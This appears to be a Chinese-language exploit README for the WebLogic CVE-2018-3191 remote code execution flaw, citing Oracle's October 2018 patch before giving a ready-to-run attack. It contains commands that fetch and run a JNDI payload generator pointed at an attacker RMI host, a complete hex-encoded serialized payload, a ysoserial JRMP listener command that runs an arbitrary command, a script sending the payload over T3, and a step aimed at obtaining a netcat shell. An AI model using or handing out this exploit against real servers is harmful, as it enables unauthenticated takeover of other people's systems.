Weblogic-CVE-2018-3191远程代码命令执行漏洞

weblogic For Docker 环境

0x00 简介

北京时间10月17日，Oracle官方发布的10月关键补丁更新CPU（Critical Patch Update）中修复了一个高危的WebLogic远程代码执行漏洞（CVE-2018-3191）。

该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server，成功的漏洞利用可导致WebLogic Server被攻击者接管，从而造成远程代码执行。

Oracle官方CPU链接：

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html

官方修复方案:

Oracle官方已经在10月关键补丁更新CPU（Critical Patch Update）中修复了该漏洞，强烈建议受影响的用户尽快升级更新进行防护。

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixFMW

0x01 Generate Payload

Usage:

`

java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://www.canyouseeme.cc:6668/Jas502n >jas502n.txt

https://github.com/voidfyoo/CVE-2018-3191/releases/download/10.3.6.0/weblogic-spring-jndi-10.3.6.0.jar

wget https://github.com/voidfyoo/CVE-2018-3191/releases/download/12.2.1.3/weblogic-spring-jndi-12.2.1.3.jar

java -jar weblogic-spring-jndi.jar <jndi_address>

Example:

java -jar weblogic-spring-jndi.jar rmi://192.168.1.1:1099/Exp

weblogic-spring-jndi-12.2.1.3.jar for weblogic:

12.2.1.3

weblogic-spring-jndi-10.3.6.0.jar for weblogic:

10.3.6.0 12.2.1.0 12.1.3.0 12.2.1.1

`

payload(hex):

aced00057372004d636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e6a74612e4a74615472616e73616374696f6e4d616e616765724ef3ecfbb628982f0200085a001a616c6c6f77437573746f6d49736f6c6174696f6e4c6576656c735a001c6175746f6465746563745472616e73616374696f6e4d616e616765725a00196175746f646574656374557365725472616e73616374696f6e5a00146361636865557365725472616e73616374696f6e5a001f757365725472616e73616374696f6e4f627461696e656446726f6d4a6e64694c00167472616e73616374696f6e4d616e616765724e616d657400124c6a6176612f6c616e672f537472696e673b4c00267472616e73616374696f6e53796e6368726f6e697a6174696f6e52656769737472794e616d6571007e00014c0013757365725472616e73616374696f6e4e616d6571007e00017872005e636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e737570706f72742e4162737472616374506c6174666f726d5472616e73616374696f6e4d616e6167657235f8d3063abc94c402000749000e64656661756c7454696d656f75745a001d6661696c4561726c794f6e476c6f62616c526f6c6c6261636b4f6e6c795a0024676c6f62616c526f6c6c6261636b4f6e50617274696369706174696f6e4661696c7572655a00186e65737465645472616e73616374696f6e416c6c6f7765645a0017726f6c6c6261636b4f6e436f6d6d69744661696c75726549001a7472616e73616374696f6e53796e6368726f6e697a6174696f6e5a001b76616c69646174654578697374696e675472616e73616374696f6e7870ffffffff00010100000000000000010101007070740025726d693a2f2f7777772e63616e796f757365656d652e63633a363636382f4a61733530326e

0x02 Linsten java RMI

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 6668 CommonsCollections1 "command"

root@374bb3d9a2d8:/tools# ./rmi.sh 
* Opening JRMP listener on 6668

0x03 Send Payload to T3

python weblogic.py www.canyouseeme.cc 7001 jas502n.txt

0x04 Get-Nc-Shell

0x05 参考链接

https://github.com/voidfyoo/CVE-2018-3191

YouTube 演示视频